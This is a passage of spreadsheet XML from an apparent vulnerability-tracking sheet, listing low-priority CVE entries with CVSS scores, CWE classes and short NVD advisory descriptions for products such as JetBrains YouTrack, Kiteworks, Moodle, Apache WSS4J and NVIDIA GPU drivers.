          <t>CVE-2026-93464</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability via custom content descriptions exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93464</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100272</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 missing authorisation in the notification template preview allowed Project Administrators to read restricted issues</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100272</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100278</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 users with restricted permission could edit and hide other users' comments</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100278</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102111</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>Kiteworks did not enforce the maximum permitted value for a configurable security-policy setting. An authenticated administrator could set this value outside its intended range so that the associated control never activated, while the control continued to appear enabled in the administrative interface and audit log, allowing it to be silently rendered ineffective.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102111</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102140</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could initiate an administrative import using a file whose contents were not fully verified, because the import validated only the file's header rather than the complete file. This could allow unverified or forged content to be accepted and processed, affecting the integrity of the imported data.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102140</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97246</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in ShortPixel Image Optimizer &lt;= 6.5.5 versions.</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97246</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100265</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Rider before 2026.2.1 aI Assistant could auto-update third-party skills without user confirmation</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100265</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92899</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>Apache WSS4J remembers the Nonce of each UsernameToken it accepts, so a captured token cannot be reused. It stored the Nonce as raw base64 text, but authentication decodes that text and uses the bytes.The same bytes can be written as base64 in several ways. An attacker who captured an authenticated request could re-send it with a space added to the Nonce: the password digest still verified, but the token no longer matched the remembered one, so the replay was accepted. Since a UsernameToken does not cover the message body, the captured token could then be reused on requests of the attacker's choosing until it expired. Affects deployments with a nonce replay cache configured, as Apache CXF has by default, and only tokens using a password digest. The cache is now keyed on the decoded Nonce. Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92899</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100263</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 stored HTML injection via the User-Agent header was possible</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100263</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102107</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core contains a business logic flaw in a Kiteworks file-request feature allowed an authenticated user to send a request that appeared to originate from another user, because the server did not verify that the requester was authorized to act as the specified account. This could be used to solicit files or information from a recipient under a trusted identity; exploitation requires the feature to be enabled for the attacker's profile and the targeted recipient to act on the request.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102107</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102581</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Insufficient output escaping in templates used to display forum posts enables a stored cross-site scripting (XSS) vulnerability. An attacker can inject malicious content into a forum post, which then executes arbitrary script code in the browser of another user viewing the affected post.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102581</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47526</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47526</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47531</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47531</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47562</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could inject crafted text into the kernel log because the supplied version string is not properly sanitized. A successful exploit of this vulnerability might lead to denial of service and data tampering.</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47562</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100257</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 sSRF via stored XHTML injection was possible during PDF export</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100257</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100258</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 missing authorisation allowed read-only users to read project settings</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100258</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100259</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 improper access control on Gantt chart allowed edits by users with view-only access</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100259</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
